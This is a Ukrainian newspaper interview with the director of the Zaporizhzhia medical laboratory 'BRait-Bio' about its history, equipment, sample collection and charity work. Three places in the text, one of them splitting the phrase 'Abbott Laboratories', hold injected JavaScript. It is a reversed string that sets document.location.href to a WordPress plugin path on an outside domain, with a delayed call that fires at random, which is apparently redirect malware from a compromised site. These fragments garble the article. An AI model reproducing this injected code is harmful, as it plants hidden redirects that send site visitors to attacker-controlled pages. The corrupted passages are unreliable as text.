Життя дуже примхливе, і інколи трапляються ті речі, яких кожен з нас хотів би уникнути. Хтось постійно слідкує за станом свого здоров’я, а хтось лише тодi, коли щось заболить. Безсумнівно, усіх цих людей пов’язує одне – перед лікуванням лікарі призначають здати аналізи. Про медичну лабораторію «БРайт-Біо» й піде мова у цьому матеріалі – ви дізнаєтесь багато нового, про що могли навiть не замислюватись.
Щоб дізнатися про лабораторію, редакція газети «Горожанин-Інформ» звернулася до директора та одного з засновників компанії Віктора Олексійовича Романько.
– З чого почався ваш шлях у бізнес, пов’язаний з медичною лабораторією?
– Лабораторію заснували дві людини – я, як вам зрозуміло, один з них. Підприємство ми зареєстрували 31 грудня 1992 року, прямісінько перед Новим роком. Озираючись на минуле, складно повірити, що наприкінці цього року компанія відсвяткує 30 років на ринку.
Почали ми з того, що займалися виробництвом медичного інструменту. У нас під боком була «Дніпроспецсталь», з нержавійки й робили інструмент, він майже вічний, якщо звичайно його не вкрадуть.
Пізніше, коли на ринок зайшли інструменти з Чехії, Китаю, з чорного металу, які були гіршої якості, але що важливіше – дешевші, попит на інструменти швидко впав, адже усі закупили дешеві інструменти. У той час необхідно було заради збереження людей шукати вихід з ситуації. Людей я зміг зберегти. У якості виходу з ситуації почали торгувати медичним обладнанням.
Ключовий момент, який і став вирішальним, стався у Києві, завдяки приладу у Жовтневій лікарні. На той час, то був зразок, єдиний в Україні. Його привезла одна з німецьких компаній у якості прилада для презентації. Він був ще «сирий», тобто в ньому багато чого не допрацювали, було мало функцій. Через рік цей прилад отримав більше параметрів, виробники у Німеччині не сиділи склавши руки та постійно покращували, допрацьовували його.
Це було більш точне обладнання, ніж було у лікарнях, у якому постійно з’являлися нові можливості тестуваня. Ті аналізи, що раніше потрібно було відправляти з Запоріжжя у Харків та чекати результатів до місяця, тепер були доступними, а результати ставали відомі за день.
– Як ви змогли отримати це обладнання, воно мабуть коштувало дуже багато?
– Цей прилад ми отримали завдяки об’єднанню двох конкуруючих компаній з Австрії та Німеччини, з однією з компаній у нас були гарні стосунки, та нас попросили це обладнання забрати, адже вивозити його назад з України було дуже дорого, тому ми поїхали, домовились, уклали контракт та привезли його до Запоріжжя.
Цей прилад був дуже красивий, навіть зараз він виглядає чудово, так і не захотіли його продавати, залишили собі. Тепер, коли він відпрацював своє, то залишився у нас як частина історії.
Ви навіть не можете замислитись, які авантюри тоді необхідні були для роботи. Тоді навіть представництва виробника в Україні не було.
Коли все починалось, то Москва заборонила інженерам приїжджати в Україну для обслуговування приладів. Щоб вирішити цю проблеми, ми були вимушені привозити інженера у короткі терміни.
Після його основної роботи у п’ятницю він сідав на потяг та їхав до нас. У суботу ми його зустрічали. Вже у неділю він їхав назад, щоб у понеділок вийти на роботу, наче нічого не відбувалося. З цього приладу і почалась вся лабораторія.
– Де почала працювати ваша перша лабораторія?
– Ми заключили договір оренди приміщення на території 7-ї медично-санітарної частини. Нас тоді порекомендували головному лікарю, запевнили, що ця лабораторія потрібна і буде корисна. Завдяки цьому нам погодились здати в аренду частину приміщення – старого хірургічного корпусу. Після ремонту ми почали там працювати, вже 1 червня 1999 року лабораторія була готова проводити аналізи. Згодом ми отримали змогу викупити будівлю поруч – старий гінекологічний корпус. На той час лабораторія була напроти. Зробили реконструкцію, ремонт і з 2008 року досі працюємо у цій будівлі. Закупаємо обладнання за потреби, збільшуємо спектр послуг. Робили все поступово.
toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2022-01-24_13-57-34.jpg” alt=”” width=”1280″ height=”960″ />
– Ви збираєте аналізи лише в Запоріжжі?
– Ні, в нас наразі багато пунктів забору, але не завжди люди розуміють, що вони можуть здавати аналізи без необхідності їм їхати безпосередньо у Запоріжжя. Наша лабораторія має багато пунктів як у самому Запоріжжі та області так і у сусідніх областях. Ми збираємо біоматеріал також з Дніпропетровської, Полтавської та північної частини Донецької областей.
– Які виникали проблеми за час існування лабораторії?
– Завжди виникають ті чи інші проблеми. У 2013 році намагалися налагодити співпрацю з партнерами з Німеччини, але нестабільна ситуація змусила припинити перемовини, адже не було впевненості у тому, що буде завтра. До нас почали приходити багато перевірок, за декілька місяців більше 25! Всі намагалися нас зачинити.
Лабораторія почалася з першого в Україні унікального обладнання, а потім перетворилася в таку сучасну, передову лабораторію.
– Є особливості серед ваших клієнтів?
– Кожен клієнт для нас особливий та важливий. У лабораторії є постійні клієнти. Це ті групи людей, наприклад, діабетики, люди, у яких проблеми з серцево-судинною системою, з проблемами щитовидної залози і так далі. Таким людям просто необхідно робити аналізи постійно, щоб вони завжди були впевнені у результаті та могли дивитися на загальну динаміку. Саме результати у динаміці можуть допомогти слідкувати за станом здоров’я, особливо при наявності хронічних захворювань.
– Ви використовуєте обладнання однієї фірми?
– Особливість сучасного обладнання в тому, що у різних країн-виробників трохи різне бачення того, які важливі параметри потрібно дізнатися за результатом аналізу. В одній компанії є один спектр параметрів, у другій компанії – трохи інший. Нам потрібно отримати обидва варіанти одночасно, щоб розширити обсяг доступних досліджень. Саме тому в лабораторії представлено обладнання Roche Diagnostics, Abbott Laboratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tories, Siemens, це дозволяє нашій лабораторії робити більш широкий спектр аналізів. Обладнання виготовлене світовими лідерами у галузі діагностики, що звичайно впливає на якість результатів.
– За якими аналізами найчастіше звертаються?
– У нашому регіоні найбільш часто звертаються за аналізами, пов’язаними з щитовидною залозою. Можливо, через екологію, а може є якийсь інший чинник. Не знаю. Ще багато аналізів пов’язані з жіночою гінекологією та інфекціями.
– Під щитовидною залозою маєте на увазі різноманітні гормональні аналізи?
– Так. Ці аналізи замовляють усі – починаючи від молоді і завершуючи дорослими людьми. Цікаве спостереження з мого боку – місто Кам’янське, за станом екології схоже на Запоріжжя , але там з щитовидною залозою менше звернень.
– Ви займаєтесь доброчинністю?
– Так, до нас багато звертаються, допомагаємо інтернатам та дитячим лікарням, всім, хто пов’язаний з піклуванням про дітей.
В нас є досвід співпраці з військовими, багато років лабораторія допомагала шпиталю, проте через скандали, пов’язані з самим шпиталем, припинили співробітництво.
Можу запевнити, для інтернатів ми готові безкоштовно робити аналізи. У нас багато пунктів забору, тому це не буде проблемою. Для інтернатів це буде можливістю слідкувати за станом здоров’я дітей у тому обсязі, який раніше їм був недоступний через фінансове навантаження.
– Ви відкрито афішуєте свою доброчинність?
– Ні, мені це не потрібно. Я роблю це не для того, щоб про це писали чи говорили. Не займаюсь розголошенням цього на публіку, ми просто це робимо. Якщо до нас звертаються, то ми майже не відмовляємо.
toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_2022-01-24_13-57-01.jpg” alt=”” width=”1280″ height=”960″ />
– Самі заклади чи влада вас заохочує чи нагороджує?
– Сам я нічого не прошу, просто надсилають. Мені не потрібні ні грамоти, ні подяки, адже я роблю це не заради цього. Роблю це тому, що можу і хочу допомогти, а не заради відзнаки.
Мотревич Олексій